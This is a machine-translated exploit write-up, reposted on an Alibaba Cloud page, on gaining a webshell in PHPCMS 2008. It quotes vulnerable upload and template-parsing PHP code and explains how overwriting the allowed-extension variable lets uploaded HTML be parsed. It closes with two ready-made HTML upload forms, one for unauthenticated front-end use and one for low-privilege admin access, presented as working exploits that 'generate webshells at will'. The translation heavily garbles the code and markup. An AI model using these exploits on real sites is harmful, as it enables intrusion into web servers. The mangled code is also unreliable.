Home > Cloud Computing > Cloud Security

Phpcms foreground and (low background permissions) getshell1

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

1. First, let's talk about the front-end service. It is estimated that many sites have been supplemented. It is targeted at phpcms 2008, the second attack category, and the second parsing getshell.

In upload_field.php

  
<Br/> $ upload_allowext =! Empty ($ C ['upload _ allowext '])? $ C ['upload _ allowext ']: $ info ['upload _ allowext']; </p> <p> // vulnerability trigger point overwrites $ upload_allowext with a variable assigned to html </p> <p> $ upload_maxsize =! Empty ($ C ['upload _ maxsize'])? $ C ['upload _ maxsize']: $ info ['upload _ maxsize'] * 1024; </p> <p> $ isthumb = isset ($ C ['thumb _ enable'])? $ C ['thumb _ enable']: ($ PHPCMS ['thumb _ enable'] & #038; & $ info ['isthumb']? 1: 0); </p> <p> $ iswatermark = isset ($ C ['watermark _ enable'])? $ C ['watermark _ enable']: ($ PHPCMS ['watermark _ enable'] & #038; & $ info ['iswatermark']? 1: 0); </p> <p> $ thumb_width = isset ($ width )? $ Width: (isset ($ C ['thumb _ width'])? $ C ['thumb _ width']: ($ info ['thumb _ width']? $ Info ['thumb _ width']: $ PHPCMS ['thumb _ width']); </p> <p> $ thumb_height = isset ($ height )? $ Height: (isset ($ C ['thumb _ height'])? $ C ['thumb _ height']: ($ info ['thumb _ height']? $ Info ['thumb _ height']: $ PHPCMS ['thumb _ height']); </p> <p> $ watermark_img = PHPCMS_ROOT. ($ info ['watermark _ img ']? $ Info ['watermark _ img ']: $ PHPCMS ['watermark _ img']); </p> <p> $ attachment = new attachment ($ mod ); // instantiate the attachment upload class </p> <p> if ($ dosubmit) </p> <p >{</p> <p> $ attachment-> upload ($ uploadtext, $ upload_allowext, $ upload_maxsize, 1 ); </p> <p> // The vulnerability trigger point references the attachment upload class. <br/>

 

Here we can use? C [upload_allowext] = html & C [upload_maxsize] = 1024000 to overwrite the upload type, so that we can use malicious scripts to upload, but cannot directly upload php or the like, you can trace the attachment class file. However, you can upload html

60 rows in preview. php

  
<Br/> $ head ['description'] = $ r ['description']; </p> <p> if (! $ Template) $ template = $ C ['template _ show ']; // overwrite the $ template variable with the variable </p> <p> include template ('phpcms ', $ template); // call the template parsing function </p> <p> // The parsing template method </p> <p> function template ($ module = 'phpcms ', $ template = 'index', $ istag = 0) </p> <p >{</p> <p> $ compiledtplfile = TPL_CACHEPATH. $ module. '_'. $ template. '. tpl. php '; </p> <p> if (TPL_REFRESH & #038 ;&(! File_exists ($ compiledtplfile) | @ filemtime (TPL_ROOT.TPL_NAME. '/'. $ module. '/'.w.template.'.html')> @ filemtime ($ compiledtplfile) | @ filemtime (TPL_ROOT.TPL_NAME. '/tag. inc. php ')> @ filemtime ($ compiledtplfile) </p> <p >{</p> <p> require_once PHPCMS_ROOT. 'include/template. func. php'; </p> <p> template_compile ($ module, $ template, $ istag ); // template parsing </p> <p >}</p> <p> return $ compiledtplfile; </p> <p >}</p> <p> // continue to trace the template_compile function. <br/>

 

2 rows in template. func. php


 

<Br/> function template_compile ($ module, $ template, $ istag = 0) </p> <p >{</p> <p> $ tplfile = TPL_ROOT.TPL_NAME. '/'. $ module. '/'.w.template.'.html'; // $ template controllable </p> <p> $ content = @ file_get_contents ($ tplfile); // trigger the vulnerability, parse the constructed malicious file </p> <p> if ($ content = false) showmessage ("$ tplfile is not exists! "); </P> <p> $ compiledtplfile = TPL_CACHEPATH. $ module. '_'. $ template. '. tpl. php '; </p> <p> $ content = ($ istag | substr ($ template, 0, 4) = 'tag _')? '<? Php function _ tag _'. $ module. '_'. $ template. '($ data, $ number, $ rows, $ count, $ page, $ pages, $ setting) {global $ PHPCMS, $ MODULE, $ M, $ CATEGORY, $ TYPE, $ AREA, $ GROUP, $ MODEL, $ templateid, $ _ userid, $ _ username; @ extract ($ setting);?> '. Template_parse ($ content, 1).' <? Php }?> ': Template_parse ($ content); </p> <p> $ strlen = file_put_contents ($ compiledtplfile, $ content); </p> <p> @ chmod ($ compiledtplfile, (0777); </p> <p> return $ strlen; </p> <p >}< br/>

This is the resolution.

Finally, the exp is given as follows:

  
</P> <form action =" http://xxx.com/upload_field.php?C [Upload_allowext] = html & #038; C [upload_maxsize] = 1024000 & #038; uinfo = 1 "method =" post "enctype =" multipart/form-data "> <! -- Modify the URL --> </p> <input type = "file" name = "1"> </p> <input type = "hidden" value = "1" name = "uploadtext"> </p> <input type = "hidden" value = "" name = "catid"> </p> <p> <input type = "hidden" value = "" name = "rename"> </p> <input type = "hidden" value = "" name = "oldname "> </p> <input type =" hidden "value =" 1 "name =" modelid "> </p> <input type =" hidden ""value =" 1 "name =" fieldid "> </p> <input type =" hidden "value =" 300 "name =" width "> </p> <p> <input type = "hidden" value = "300" name = "height"> </p> <input type = "hidden" value = "100000 "name =" MAX_FILE_SIZE "> </p> <input type =" submit "name =" dosubmit "value =" Upload "style =" margin-top: 5px; height: 28px; "> </p> </form> 

 


2. getshell with low background Permissions


Many people get phpcms 2008 in the background and suffer from shell... Pondering


Gu contributed a 0-day post. As long as there is a post in the background, you can use shell.


The principle is the same. When uploading images in the background, the variables can also be overwritten to achieve getshell.


The same principle. An exp demonstration is provided.
 

</P> <form action = "http://www.xxx.cn/admin.php? Mod = phpcms & #038; file = upload_field & #038; C [upload_allowext] = html & #038; C [upload_maxsize] = 1024000 & #038; uinfo = 1 "method =" post "enctype =" multipart/form-data "> <! -- Modify the URL --> </p> <input type = "file" name = "1"> </p> <input type = "hidden" value = "1" name = "uploadtext"> </p> <input type = "hidden" value = "" name = "catid"> </p> <p> <input type = "hidden" value = "" name = "rename"> </p> <input type = "hidden" value = "" name = "oldname "> </p> <p>
You only need to change it to admin. php.

Similarly, getshell generates webshells at will.

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More